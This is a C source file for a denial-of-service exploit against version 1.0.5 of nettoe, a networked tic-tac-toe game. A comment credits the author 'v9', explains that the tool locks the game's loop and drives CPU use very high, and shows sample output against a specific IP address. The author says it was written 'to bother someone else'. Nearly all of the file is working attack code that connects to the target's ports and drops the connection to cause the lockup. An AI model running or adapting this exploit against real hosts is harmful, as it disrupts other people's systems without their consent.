/* (linux)nettoe[v1.0.5] denial of service.  by: v9[v9@fakehalo.org].  this will
   make nettoe's cpu usage go through to roof.  i was mainly looking through
   the source to this program to find security breaches in order to execute
   arbitrary code.  i found this in the process, this will make the cpu usage of
   nettoe go extremely high, and lock the game(loop), allowing you to disconnect
   and it still be absorbing cpu usage. (it pissed me off when i did it by
   accident, so i figured it was worth slapping this together to bother someone
   else somewhere)

   example:
    # ./killntoe 209.214.40.98
    [ nettoe[v1.0.5]: cpu lock/overload DoS, by v9[v9@fakehalo.org].
    *** target: 209.214.40.98(client:7501!server:7502), idle time: 15.
    *** binding port. (server:7502)
    *** connecting to 209.214.40.98. (client:7501)
    *** closing connection, to start the game. (server:7502)
    *** now waiting idle time(15), to insure the lockup.
    *** closing connection, should already be locked. (client:7501)
    *** completed program, exiting.

   note: it must start as the players(your) turn for this to work.
*/
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#define DEFAULT_CLIENT_PORT 7501	// shouldn't need to be changed.
#define DEFAULT_SERVER_PORT 7502	// shouldn't need to be changed.
#define DEFAULT_IDLE 15			// to allow nettoe's internal sleep()s
main(int argc,char **argv){
 char target[256];
 int remote,data,sock,cport,sport,idle;
 struct sockaddr_in a,ra,s;
 struct hostent *t;
 data=socket(AF_INET,SOCK_STREAM,0);
 if(argc<2){printf("*** syntax: %s <target> [idle(secs)] [client port] [server "
 "port]\n",argv[0]);exit(-1);}
 else{strncpy(target,argv[1],256);}
 if(argc>2){idle=atoi(argv[2]);}
 else{idle=DEFAULT_IDLE;}
 if(argc>3){cport=atoi(argv[3]);}
 else{cport=DEFAULT_CLIENT_PORT;}
 if(argc>4){sport=atoi(argv[4]);}
 else{sport=DEFAULT_SERVER_PORT;}
 printf("[ nettoe[v1.0.5]: cpu lock/overload DoS, by v9[v9@fakehalo.org].\n"); 
 printf("*** target: %s(client:%d!server:%d), idle time: %d.\n",target,cport,
 sport,idle); 
 a.sin_family=AF_INET;
 a.sin_port=htons(sport);
 a.sin_addr.s_addr=INADDR_ANY;
 printf("*** binding port. (server:%d)\n",sport);
 if(bind(data,(struct sockaddr*)&a,16)){printf("error: bind();\n");exit(-1);}
 else{
  switch(fork()){
   case 0:
    listen(data,5);
    bzero((char*)&ra,sizeof(struct sockaddr_in));
    remote=accept(data,&ra,16);
    sleep(1);
    printf("*** closing connection, to start the game. (server:%d)\n",sport);
    close(data);
    printf("*** now waiting idle time(%d), to insure the lockup.\n",idle);
    exit(0);
    break;
   case -1:
    printf("error: fork();\n");
    exit(-1);
    break;
   default:
    if(s.sin_addr.s_addr=inet_addr(target)){
     if(!(t=gethostbyname(target))){
      printf("error: couldn't resolve. (%s)\n",target);
      exit(-1);
     }
     memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
    }
    s.sin_family=AF_INET;
    s.sin_port=htons(cport);
    sock=socket(AF_INET,SOCK_STREAM,0);
    printf("*** connecting to %s. (client:%d)\n",target,cport);
    if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){printf("error: connecti"
    "on failed. (%d)\n",cport);}
    else{
     sleep(idle);
     printf("*** closing connection, should already be locked. (client:%d)\n",
     cport);
     close(remote);
     printf("*** completed program, exiting.\n");
     exit(0);
    }
    break;
  }
  exit(0);
 }
}